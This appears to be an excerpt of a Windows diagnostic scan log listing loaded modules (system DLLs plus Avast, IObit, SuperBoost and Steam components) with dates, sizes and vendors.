MOD - [2017/09/29 14:42:22 | 000,138,752 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\glu32.dll
MOD - [2017/09/29 14:42:22 | 000,023,040 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\secur32.dll
MOD - [2017/09/29 14:42:22 | 000,021,504 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\npmproxy.dll
MOD - [2017/09/29 14:42:19 | 000,397,824 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wbemcomn.dll
MOD - [2017/09/29 14:42:19 | 000,248,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wbem\wbemdisp.dll
MOD - [2017/09/29 14:42:19 | 000,103,936 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wbem\wmiutils.dll
MOD - [2017/09/29 14:42:19 | 000,048,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wbem\wbemsvc.dll
MOD - [2017/09/29 14:42:19 | 000,035,840 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wbem\wbemprox.dll
MOD - [2017/09/29 14:42:19 | 000,016,384 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wsock32.dll
MOD - [2017/09/29 14:42:18 | 001,587,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msxml3.dll
MOD - [2017/09/29 14:42:18 | 000,769,536 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wbem\fastprox.dll
MOD - [2017/09/29 14:42:18 | 000,054,784 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\NapiNSP.dll
MOD - [2017/09/29 14:42:17 | 001,183,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\networkexplorer.dll
MOD - [2017/09/29 14:42:16 | 001,435,136 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dbghelp.dll
MOD - [2017/09/29 14:42:16 | 001,027,912 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dcomp.dll
MOD - [2017/09/29 14:42:16 | 000,406,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\schannel.dll
MOD - [2017/09/29 14:42:16 | 000,318,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Wldap32.dll
MOD - [2017/09/29 14:42:16 | 000,224,216 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cfgmgr32.dll
MOD - [2017/09/29 14:42:16 | 000,133,312 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\userenv.dll
MOD - [2017/09/29 14:42:16 | 000,132,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\devobj.dll
MOD - [2017/09/29 14:42:16 | 000,132,096 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dbgcore.dll
MOD - [2017/09/29 14:42:16 | 000,126,872 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dwmapi.dll
MOD - [2017/09/29 14:42:16 | 000,110,608 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\gpapi.dll
MOD - [2017/09/29 14:42:16 | 000,086,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mpr.dll
MOD - [2017/09/29 14:42:16 | 000,077,824 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\usp10.dll
MOD - [2017/09/29 14:42:16 | 000,074,952 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\srvcli.dll
MOD - [2017/09/29 14:42:16 | 000,062,976 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dhcpcsvc.dll
MOD - [2017/09/29 14:42:16 | 000,057,856 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dhcpcsvc6.dll
MOD - [2017/09/29 14:42:16 | 000,037,760 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\netutils.dll
MOD - [2017/09/29 14:42:16 | 000,025,600 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\hid.dll
MOD - [2017/09/29 14:42:16 | 000,024,064 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winrnr.dll
MOD - [2017/09/29 14:42:16 | 000,011,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\IconCodecService.dll
MOD - [2017/09/29 14:42:14 | 002,386,312 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\combase.dll
MOD - [2017/09/29 14:42:14 | 001,575,896 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\crypt32.dll
MOD - [2017/09/29 14:42:14 | 001,481,728 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dui70.dll
MOD - [2017/09/29 14:42:14 | 000,832,648 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\WinTypes.dll
MOD - [2017/09/29 14:42:14 | 000,713,216 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\d3d8.dll
MOD - [2017/09/29 14:42:14 | 000,593,536 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\oleaut32.dll
MOD - [2017/09/29 14:42:14 | 000,549,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cryptui.dll
MOD - [2017/09/29 14:42:14 | 000,519,640 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\clbcatq.dll
MOD - [2017/09/29 14:42:14 | 000,483,328 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\duser.dll
MOD - [2017/09/29 14:42:14 | 000,370,920 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Faultrep.dll
MOD - [2017/09/29 14:42:14 | 000,334,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mswsock.dll
MOD - [2017/09/29 14:42:14 | 000,273,840 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\powrprof.dll
MOD - [2017/09/29 14:42:14 | 000,264,192 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\pdh.dll
MOD - [2017/09/29 14:42:14 | 000,189,112 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\IPHLPAPI.DLL
MOD - [2017/09/29 14:42:14 | 000,187,168 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\xmllite.dll
MOD - [2017/09/29 14:42:14 | 000,184,984 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\rsaenh.dll
MOD - [2017/09/29 14:42:14 | 000,178,176 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dinput8.dll
MOD - [2017/09/29 14:42:14 | 000,177,704 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ntasn1.dll
MOD - [2017/09/29 14:42:14 | 000,152,440 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ntmarta.dll
MOD - [2017/09/29 14:42:14 | 000,143,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\imm32.dll
MOD - [2017/09/29 14:42:14 | 000,136,704 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cryptnet.dll
MOD - [2017/09/29 14:42:14 | 000,119,416 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ncrypt.dll
MOD - [2017/09/29 14:42:14 | 000,119,384 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cabinet.dll
MOD - [2017/09/29 14:42:14 | 000,104,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ncryptsslp.dll
MOD - [2017/09/29 14:42:14 | 000,084,992 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\samlib.dll
MOD - [2017/09/29 14:42:14 | 000,070,144 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\samcli.dll
MOD - [2017/09/29 14:42:14 | 000,068,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\cryptsp.dll
MOD - [2017/09/29 14:42:14 | 000,059,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wkscli.dll
MOD - [2017/09/29 14:42:14 | 000,057,344 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ntlanman.dll
MOD - [2017/09/29 14:42:14 | 000,049,648 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msasn1.dll
MOD - [2017/09/29 14:42:14 | 000,040,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wmiclnt.dll
MOD - [2017/09/29 14:42:14 | 000,037,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\perfdisk.dll
MOD - [2017/09/29 14:42:14 | 000,036,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\XInput1_4.dll
MOD - [2017/09/29 14:42:14 | 000,035,840 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\credui.dll
MOD - [2017/09/29 14:42:14 | 000,018,944 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\fltLib.dll
MOD - [2017/09/29 14:42:14 | 000,013,312 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dpapi.dll
MOD - [2017/09/29 14:42:14 | 000,012,800 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\d3d8thk.dll
MOD - [2017/09/29 14:42:14 | 000,011,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wship6.dll
MOD - [2017/09/29 14:42:14 | 000,010,752 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\WSHTCPIP.DLL
MOD - [2017/09/29 14:42:14 | 000,007,168 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msimg32.dll
MOD - [2017/09/29 14:42:14 | 000,005,120 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\normaliz.dll
MOD - [2017/09/29 14:42:13 | 000,550,168 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\SHCore.dll
MOD - [2017/09/29 14:42:13 | 000,264,000 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Windows.Media.MediaControl.dll
MOD - [2017/09/29 14:42:13 | 000,068,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\netapi32.dll
MOD - [2017/09/29 14:42:13 | 000,052,224 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\pcacli.dll
MOD - [2017/09/29 14:42:13 | 000,037,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\perfproc.dll
MOD - [2017/09/29 14:42:13 | 000,017,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\psapi.dll
MOD - [2017/09/29 14:42:12 | 000,139,264 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\oledlg.dll
MOD - [2017/09/29 14:42:11 | 000,929,768 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\MrmCoreR.dll
MOD - [2017/09/29 14:42:11 | 000,374,680 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\coml2.dll
MOD - [2017/09/29 14:42:11 | 000,318,776 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\BCP47Langs.dll
MOD - [2017/09/29 14:42:11 | 000,300,544 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\FWPUCLNT.DLL
MOD - [2017/09/29 14:42:11 | 000,300,032 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\PlayToDevice.dll
MOD - [2017/09/29 14:42:11 | 000,149,840 | ---- | M] () -- C:\Windows\SysWOW64\InputHost.dll
MOD - [2017/09/29 14:42:11 | 000,131,072 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\globinputhost.dll
MOD - [2017/09/29 14:42:11 | 000,128,000 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\fwbase.dll
MOD - [2017/09/29 14:42:11 | 000,076,288 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Windows.Shell.ServiceHostBuilder.dll
MOD - [2017/09/29 14:42:11 | 000,047,600 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\kernel.appcore.dll
MOD - [2017/09/29 14:42:11 | 000,016,896 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wshqos.dll
MOD - [2017/09/29 14:42:10 | 002,761,216 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msftedit.dll
MOD - [2017/09/29 14:42:10 | 002,313,472 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\CoreUIComponents.dll
MOD - [2017/09/29 14:42:10 | 001,668,096 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\UIAutomationCore.dll
MOD - [2017/09/29 14:42:10 | 000,480,912 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\TextInputFramework.dll
MOD - [2017/09/29 14:42:10 | 000,133,824 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\gdi32.dll
MOD - [2017/09/29 14:42:10 | 000,112,176 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dxva2.dll
MOD - [2017/09/29 14:42:09 | 002,993,208 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
MOD - [2017/09/29 14:42:09 | 001,503,600 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\WindowsCodecs.dll
MOD - [2017/09/29 14:42:09 | 001,239,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Windows.Globalization.dll
MOD - [2017/09/29 14:42:09 | 000,697,344 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\twinui.appcore.dll
MOD - [2017/09/29 14:42:09 | 000,669,184 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Windows.Storage.Search.dll
MOD - [2017/09/29 14:42:09 | 000,507,240 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\directmanipulation.dll
MOD - [2017/09/29 14:42:09 | 000,501,248 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dsound.dll
MOD - [2017/09/29 14:42:09 | 000,311,192 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\thumbcache.dll
MOD - [2017/09/29 14:42:09 | 000,278,016 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\DataExchange.dll
MOD - [2017/09/29 14:42:09 | 000,117,248 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\Kswdmcap.ax
MOD - [2017/09/29 14:42:09 | 000,101,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\DevDispItemProvider.dll
MOD - [2017/09/29 14:42:09 | 000,083,728 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\win32u.dll
MOD - [2017/09/29 14:42:09 | 000,052,736 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll
MOD - [2017/09/29 14:42:09 | 000,049,664 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mskeyprotect.dll
MOD - [2017/09/29 14:42:09 | 000,037,376 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\atlthunk.dll
MOD - [2017/09/29 14:42:08 | 001,508,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\quartz.dll
MOD - [2017/09/29 14:42:08 | 000,361,632 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\MMDevAPI.dll
MOD - [2017/09/29 14:42:08 | 000,212,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\wdmaud.drv
MOD - [2017/09/29 14:42:08 | 000,135,432 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winmm.dll
MOD - [2017/09/29 14:42:08 | 000,129,864 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winmmbase.dll
MOD - [2017/09/29 14:42:08 | 000,093,568 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msacm32.dll
MOD - [2017/09/29 14:42:08 | 000,084,720 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\devenum.dll
MOD - [2017/09/29 14:42:08 | 000,073,416 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\CompPkgSup.dll
MOD - [2017/09/29 14:42:08 | 000,031,744 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\vidcap.ax
MOD - [2017/09/29 14:42:08 | 000,029,504 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msdmo.dll
MOD - [2017/09/29 14:42:08 | 000,027,416 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\avrt.dll
MOD - [2017/09/29 14:42:08 | 000,024,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\msacm32.drv
MOD - [2017/09/29 14:42:08 | 000,019,840 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\ksuser.dll
MOD - [2017/09/29 14:42:08 | 000,018,944 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\midimap.dll
MOD - [2017/09/29 14:41:44 | 000,095,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\imagehlp.dll
MOD - [2017/09/29 14:41:43 | 000,028,440 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\winnsi.dll
MOD - [2017/09/29 14:41:43 | 000,020,216 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\nsi.dll
MOD - [2017/09/29 14:41:23 | 000,535,552 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\PortableDeviceApi.dll
MOD - [2017/09/29 14:41:23 | 000,244,224 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\dlnashext.dll
MOD - [2017/09/29 14:41:23 | 000,218,112 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\spp.dll
MOD - [2017/09/29 14:41:23 | 000,070,656 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\pnrpnsp.dll
MOD - [2017/09/29 14:41:23 | 000,061,440 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\srclient.dll
MOD - [2017/09/29 14:41:21 | 001,081,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfperfhelper.dll
MOD - [2017/09/29 14:41:21 | 001,032,176 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfreadwrite.dll
MOD - [2017/09/29 14:41:21 | 000,770,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfds.dll
MOD - [2017/09/29 14:41:21 | 000,563,200 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\mfh264enc.dll
MOD - [2017/09/29 14:41:21 | 000,454,208 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\MSAudDecMFT.dll
MOD - [2017/09/29 14:41:21 | 000,098,688 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWOW64\MP3DMOD.DLL
MOD - [2017/09/14 10:41:24 | 001,340,704 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\Scan.dll
MOD - [2017/08/30 15:04:54 | 001,279,264 | ---- | M] (CPUID) -- C:\Program Files (x86)\IObit\Advanced SystemCare\cpuidsdk.dll
MOD - [2017/08/04 13:44:16 | 000,082,720 | ---- | M] () -- C:\Program Files (x86)\IObit\Advanced SystemCare\GetProcessDLL.dll
MOD - [2017/08/04 10:38:51 | 000,810,528 | ---- | M] (Avast Software) -- C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser_crashreporter.exe
MOD - [2017/08/04 10:38:50 | 000,797,728 | ---- | M] (Avast Software) -- C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser.exe
MOD - [2017/08/04 10:38:39 | 071,398,944 | ---- | M] () -- C:\Program Files\AVAST Software\SZBrowser\4.58.2552.909\SZBrowser_browser.dll
MOD - [2017/06/28 09:23:57 | 000,067,408 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\defs\17062800\uiExt.dll
MOD - [2017/06/28 09:23:54 | 000,513,696 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\defs\17062800\aswCmnBS.dll
MOD - [2017/06/28 09:23:54 | 000,405,072 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\defs\17062800\aswCmnIS.dll
MOD - [2017/06/28 09:23:54 | 000,153,664 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\defs\17062800\aswCmnOS.dll
MOD - [2017/06/10 15:33:08 | 000,631,584 | ---- | M] () -- C:\Program Files (x86)\IObit\Advanced SystemCare\ProductStatistics.dll
MOD - [2017/05/18 07:25:41 | 000,143,232 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\afwRpc.dll
MOD - [2017/05/18 07:25:41 | 000,050,720 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\afwGeoIP.dll
MOD - [2017/05/18 07:25:40 | 000,335,944 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\afwCoreClient.dll
MOD - [2017/05/18 07:25:40 | 000,193,680 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\afwCore.dll
MOD - [2017/05/18 07:24:32 | 000,435,240 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswSZB.dll
MOD - [2017/05/18 07:21:53 | 002,095,104 | ---- | M] (The OpenSSL Project, http://www.openssl.org/) -- C:\Program Files\AVAST Software\Avast\libcrypto-1_1.dll
MOD - [2017/05/18 07:21:53 | 000,381,952 | ---- | M] (The OpenSSL Project, http://www.openssl.org/) -- C:\Program Files\AVAST Software\Avast\libssl-1_1.dll
MOD - [2017/05/18 07:21:49 | 067,717,632 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\libcef.dll
MOD - [2017/05/18 07:21:48 | 000,997,896 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\AvChrome.dll
MOD - [2017/05/18 07:21:48 | 000,428,544 | ---- | M] (The Chromium Authors) -- C:\Program Files\AVAST Software\Avast\chrome_elf.dll
MOD - [2017/05/18 07:21:47 | 008,470,464 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe
MOD - [2017/05/18 07:21:43 | 000,684,656 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\ffl2.dll
MOD - [2017/05/18 07:21:43 | 000,276,288 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\event_routing.dll
MOD - [2017/05/18 07:21:43 | 000,223,224 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\tasks_core.dll
MOD - [2017/05/18 07:21:43 | 000,176,992 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
MOD - [2017/05/18 07:21:43 | 000,131,280 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\log.dll
MOD - [2017/05/18 07:21:42 | 000,922,456 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswAux.dll
MOD - [2017/05/18 07:21:42 | 000,787,984 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswData.dll
MOD - [2017/05/18 07:21:42 | 000,674,688 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswProperty.dll
MOD - [2017/05/18 07:21:42 | 000,598,224 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswSqLt.dll
MOD - [2017/05/18 07:21:42 | 000,578,080 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\ashTaskEx.dll
MOD - [2017/05/18 07:21:42 | 000,528,720 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\ashTask.dll
MOD - [2017/05/18 07:21:42 | 000,386,904 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswCmnBS.dll
MOD - [2017/05/18 07:21:42 | 000,379,040 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswCmnIS.dll
MOD - [2017/05/18 07:21:42 | 000,338,624 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswLog.dll
MOD - [2017/05/18 07:21:42 | 000,322,000 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswUtil.dll
MOD - [2017/05/18 07:21:42 | 000,257,104 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\event_manager.dll
MOD - [2017/05/18 07:21:42 | 000,166,184 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswRemoteCache.dll
MOD - [2017/05/18 07:21:42 | 000,148,984 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswCmnOS.dll
MOD - [2017/05/18 07:21:42 | 000,097,456 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswIP.dll
MOD - [2017/05/18 07:21:42 | 000,089,720 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\aswEngLdr.dll
MOD - [2017/05/18 07:21:42 | 000,087,216 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\event_manager_rpc.dll
MOD - [2017/05/18 07:21:41 | 003,804,224 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\CommonRes.dll
MOD - [2017/05/18 07:21:41 | 001,218,672 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\ashBase.dll
MOD - [2017/05/18 07:21:41 | 001,195,272 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\commchannel.dll
MOD - [2017/05/18 07:21:41 | 000,384,736 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AavmRpch.dll
MOD - [2017/05/18 07:21:41 | 000,170,216 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
MOD - [2017/05/18 07:21:40 | 004,414,640 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\Aavm4h.dll
MOD - [2017/05/18 07:21:40 | 000,439,336 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\1036\UILangRes.dll
MOD - [2017/05/18 07:21:40 | 000,113,000 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\1036\Base.dll
MOD - [2017/05/18 07:21:30 | 000,963,664 | ---- | M] (AVAST Software s.r.o.) -- C:\Program Files\AVAST Software\Avast\aswcommx.dll
MOD - [2017/05/18 07:21:30 | 000,666,544 | ---- | M] (AVAST Software s.r.o.) -- C:\Program Files\AVAST Software\Avast\aswidpmx.dll
MOD - [2017/05/18 07:21:30 | 000,596,976 | ---- | M] (AVAST Software s.r.o.) -- C:\Program Files\AVAST Software\Avast\aswlogx.dll
MOD - [2017/05/18 07:21:29 | 000,328,776 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\gaming_probe.dll
MOD - [2017/05/18 07:21:29 | 000,291,824 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
MOD - [2017/05/18 07:21:28 | 000,984,896 | ---- | M] (AVAST Software s.r.o.) -- C:\Program Files\AVAST Software\Avast\aswsysx.dll
MOD - [2017/05/18 07:21:28 | 000,835,976 | ---- | M] (AVAST Software s.r.o.) -- C:\Program Files\AVAST Software\Avast\aswcmlx.dll
MOD - [2017/05/18 07:20:16 | 003,563,568 | ---- | M] (Terra Informatica Software, Inc., British Columbia, Canada.) -- C:\Program Files\AVAST Software\Avast\HTMLayout.dll
MOD - [2017/02/17 08:59:28 | 005,430,048 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\SmartDefrag.exe
MOD - [2017/02/15 14:56:02 | 000,199,456 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\sdassist.dll
MOD - [2017/02/13 15:39:14 | 001,033,504 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\RegisterCom.dll
MOD - [2016/11/28 12:34:52 | 004,562,616 | ---- | M] (SuperBoost Software) -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\SuperbGameBoostMain.exe
MOD - [2016/11/16 13:57:54 | 000,134,328 | ---- | M] (IObit) -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\Temperature.dll
MOD - [2016/09/21 08:42:32 | 000,215,840 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Smart Defrag\sdcore.dll
MOD - [2016/09/01 02:02:12 | 004,969,248 | ---- | M] () -- B:\Steam\v8.dll
MOD - [2016/09/01 02:02:06 | 001,563,936 | ---- | M] () -- B:\Steam\icui18n.dll
MOD - [2016/09/01 02:02:06 | 001,195,296 | ---- | M] () -- B:\Steam\icuuc.dll
MOD - [2016/08/16 13:53:02 | 000,796,480 | ---- | M] () -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\GA_IG.dll
MOD - [2016/08/16 08:20:46 | 000,510,272 | ---- | M] () -- C:\Program Files (x86)\SuperBoost\Superb Game Boost\GA_ID.dll
MOD - [2016/08/16 08:20:46 | 000,286,016 | ---- | M] () -- c:\Program Files (x86)\SuperBoost\Superb Game Boost\GA_CheackDx.dll
MOD - [2016/07/26 17:18:18 | 000,066,984 | ---- | M] (IObit) -- C:\Program Files (x86)\IObit\Advanced SystemCare\datastate.dll
